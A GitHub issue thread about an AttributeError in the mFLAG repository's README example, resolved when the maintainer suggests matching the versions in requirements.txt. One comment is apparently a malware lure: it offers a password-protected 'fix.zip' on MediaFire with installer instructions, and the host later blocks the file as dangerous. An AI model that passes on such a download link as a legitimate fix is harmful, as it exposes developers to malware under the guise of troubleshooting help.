### ISSUE TITLE
AttributeError: 'torch.Size' object has no attribute 'shape'

### ISSUE THREAD

**Issue by gyeongeunlee16** [laihuiyuan/mFLAG#5]
Hi! Nice repository. I also get the same attribute error (AttributeError: 'torch.Size' object has no attribute 'shape'`) as addressed by one of the closed issues.

When I copy and paste the same exact code under "How to use":
<img width="821" alt="Screenshot 2024-08-27 at 10 46 09 AM" src="https://github.com/user-attachments/assets/7c0864a9-7a54-4a45-912b-46d267611d61">

I get:

`Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/transformers/generation/utils.py", line 1252, in generate
    model_kwargs = self._prepare_encoder_decoder_kwargs_for_generation(
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/transformers/generation/utils.py", line 617, in _prepare_encoder_decoder_kwargs_for_generation
    model_kwargs["encoder_outputs"]: ModelOutput = encoder(**encoder_kwargs)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1511, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1520, in _call_impl
    return forward_call(*args, **kwargs)
  File "/Users/username/mFLAG/model.py", line 230, in forward
    embed_pos = self.embed_positions(input_shape)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1511, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1520, in _call_impl
    return forward_call(*args, **kwargs)
  File "/Users/username/opt/anaconda3/envs/mflag/lib/python3.8/site-packages/transformers/models/bart/modeling_bart.py", line 133, in forward
    bsz, seq_len = input_ids.shape[:2]
AttributeError: 'torch.Size' object has no attribute 'shape'`

I really hope to use this as part of my research so it would be great if you could respond. Thanks!

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gyeongeunlee16** [comment]
Thanks for your quick reply. I'm seeing: Dangerous File Blocked
The file you attempted to download was determined to be dangerous. For your protection, MediaFire does not enable distribution of dangerous files. when I try to click it.

**Comment by laihuiyuan** [comment]
Hi, could you try to use the same setting in 'requirements.txt'?

**Comment by gyeongeunlee16** [comment]
Oh I should have checked! It works now thanks :)
